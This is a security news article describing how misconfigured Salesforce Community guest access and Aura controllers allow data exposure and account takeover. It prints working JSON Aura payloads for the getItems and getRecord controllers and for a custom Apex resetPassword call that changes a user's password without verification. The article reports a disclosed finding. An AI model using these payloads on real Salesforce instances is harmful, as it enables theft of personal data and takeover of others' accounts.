Cyber Security News

Salesforce Applications Vulnerability Could Allow Full Account Takeover

A critical vulnerability has been discovered in Salesforce applications that could potentially allow a full account takeover.

The vulnerability, uncovered during a penetration testing exercise, hinges on misconfigurations within Salesforce Communities, particularly exploiting the Salesforce Lightning component framework.

The implications of this vulnerability are severe, affecting both data security and privacy. Attackers could gain access to sensitive personal information, manipulate data, and even take over administrative accounts.

Such breaches can lead to data theft, identity fraud, and significant financial and reputational damage to organizations using Salesforce.

Sample file exposed by a ContentDocument objectSample file exposed by a ContentDocument object
Sample file exposed by a ContentDocument object

The Vulnerability: A Detailed Look

The vulnerability primarily exploits Salesforce’s handling of unauthenticated users, known as Guest Users, within Communities.

Normally, Guest Users are heavily restricted in terms of what data they can access and what actions they can perform. However, in some cases, configurations and custom components expose sensitive information or functionality.

Leveraging 2024 MITRE ATT&CK Results for SME & MSP Cybersecurity Leaders – Attend Free Webinar

Key Points of Exploitation:

  • Mapping the Attack Surface: Attackers begin by mapping out the Salesforce instance to identify available endpoints and components. With valid aura.token and aura.context values, they can start extracting data and interact with various classes.
  • Using Standard Controllers: Two primary controllers are leveraged in exploiting this vulnerability:
    • getItems: Retrieves records of a given object but can bypass permissions if misconfigured. Example payload:
{
"actions": [
{
"id": "123;a",
"descriptor": "serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems",
"callingDescriptor": "UNKNOWN",
"params": {
"entityNameOrId": "ContentVersion",
"layoutType": "FULL",
"pageSize": 100,
"currentPage": 0,
"useTimeout": false,
"getCount": false,
"enableRowActions": false
}
}
]
}
  • getRecord: Retrieves specific records using a record ID.
{
  "actions": [
    {
      "id": "123;a",
      "descriptor": "serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord",
      "callingDescriptor": "UNKNOWN",
      "params": {
        "recordId": "0099g000001mWQaYHU",
        "record": null,
        "mode": "VIEW"
      }
    }
  ]
}
  • Extracting Sensitive Data: Using these controllers, attackers can extract personal identifiable information (PII), contact details, account information, and even documents from misconfigured Salesforce objects.
  • Exploiting Custom Apex Controllers: A particularly dangerous aspect is the misconfiguration of custom Apex controllers. The CA_ChangePasswordSettingController exposes a method resetPassword, which only requires a userID and a newPassword, allowing attackers to reset passwords without further verification.
{
"actions": [
{
"id": "123;a",
"descriptor": "apex://CA_ChangePasswordSettingController/ACTION$resetPassword",
"callingDescriptor": "UNKNOWN",
"params": {
"userID": "0056M",
"newPassword": "RT-wofnwo2!$4nfi!"
}
}
]
}
User’s password successfully reset

The ramifications of such a vulnerability are severe. Unauthorized access to sensitive data, identity theft, data manipulation, and full account takeovers are all possible outcomes.

In a worst-case scenario, an attacker could gain access to high-privilege accounts, resulting in the compromise of the entire Salesforce instance.

0xbro’s discovery underscores the importance of robust security practices in managing cloud-based applications.

As organizations increasingly rely on platforms like Salesforce for critical business operations, ensuring comprehensive security measures is paramount.

Adopting a proactive approach to securing applications can help mitigate risks and protect sensitive data from malicious actors.

Analyse Advanced Malware & Phishing Analysis With ANY.RUN Black Friday Deals : Get up to 3 Free Licenses.

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

Zero-Interaction libvpx Flaw in Firefox Allows Attackers to Run Arbitrary Code

Mozilla has released Firefox 139, addressing several critical and moderate security vulnerabilities that posed significant…

1 hour ago

Threat Actors Use Fake DocuSign Notifications to Steal Corporate Data

DocuSign has emerged as a cornerstone for over 1.6 million customers worldwide, including 95% of…

17 hours ago

Government Calls on Organizations to Adopt SIEM and SOAR Solutions

In a landmark initiative, international cybersecurity agencies have released a comprehensive series of publications to…

18 hours ago

WordPress TI WooCommerce Wishlist Plugin Flaw Puts Over 100,000 Websites at Risk of Cyberattack

A severe security flaw has been identified in the TI WooCommerce Wishlist plugin, a widely…

18 hours ago

Microsoft Alerts on Void Blizzard Hackers Targeting Telecommunications and IT Sectors

Microsoft Threat Intelligence Center (MSTIC) has issued a critical warning about a cluster of global…

18 hours ago

Hackers Use Fake OneNote Login to Capture Office365 and Outlook Credentials

A recent investigation by security analysts has uncovered a persistent phishing campaign targeting Italian and…

18 hours ago